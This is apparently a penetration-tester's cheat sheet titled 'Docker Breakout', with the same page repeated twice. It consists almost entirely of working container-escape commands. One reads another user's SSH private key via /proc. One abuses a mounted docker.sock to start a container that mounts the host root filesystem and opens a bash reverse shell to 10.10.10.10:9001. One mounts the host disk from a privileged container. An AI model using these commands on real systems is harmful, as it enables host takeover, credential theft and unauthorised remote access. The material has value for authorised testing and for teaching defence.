Docker Breakout

Enumeration Scripts

Process Abuse

ps -ef --forest

ls -la /proc/<PID>/root/home/qu35t/.ssh/id_rsa

Mounted docker socket

find / -name docker.sock 2>/dev/null

curl -s --unix-socket /var/run/docker.sock http://localhost/images/json

#!/bin/bash

cmd="[\"/bin/sh\",\"-c\",\"chroot /tmp sh -c \\\"bash -c 'bash -i &>/dev/tcp/10.10.10.10/9001 0<&1'\\\"\"]"

curl -s -X POST --unix-socket /var/run/docker.sock -d "{\"Image\":\"alpine\",\"cmd\":$cmd,\"Binds\":[\"/:/tmp:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create?name=qu35t

curl -s -X POST --unix-socket /var/run/docker.sock "http://localhost/containers/qu35t/start"

Container Capabilities

capsh --print

fdisk -l
mkdir /mnt/qu35t
mount /dev/sda1 /mnt/qu35t
ls -la /mnt/qu35t/

PreviousPrivilege Escalation NextShells

Last updated 2 years ago

Docker Breakout

Enumeration Scripts

Process Abuse

ps -ef --forest

ls -la /proc/<PID>/root/home/qu35t/.ssh/id_rsa

Mounted docker socket

find / -name docker.sock 2>/dev/null

curl -s --unix-socket /var/run/docker.sock http://localhost/images/json

#!/bin/bash

cmd="[\"/bin/sh\",\"-c\",\"chroot /tmp sh -c \\\"bash -c 'bash -i &>/dev/tcp/10.10.10.10/9001 0<&1'\\\"\"]"

curl -s -X POST --unix-socket /var/run/docker.sock -d "{\"Image\":\"alpine\",\"cmd\":$cmd,\"Binds\":[\"/:/tmp:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create?name=qu35t

curl -s -X POST --unix-socket /var/run/docker.sock "http://localhost/containers/qu35t/start"

Container Capabilities

capsh --print

fdisk -l
mkdir /mnt/qu35t
mount /dev/sda1 /mnt/qu35t
ls -la /mnt/qu35t/

PreviousPrivilege Escalation NextShells

Last updated 2 years ago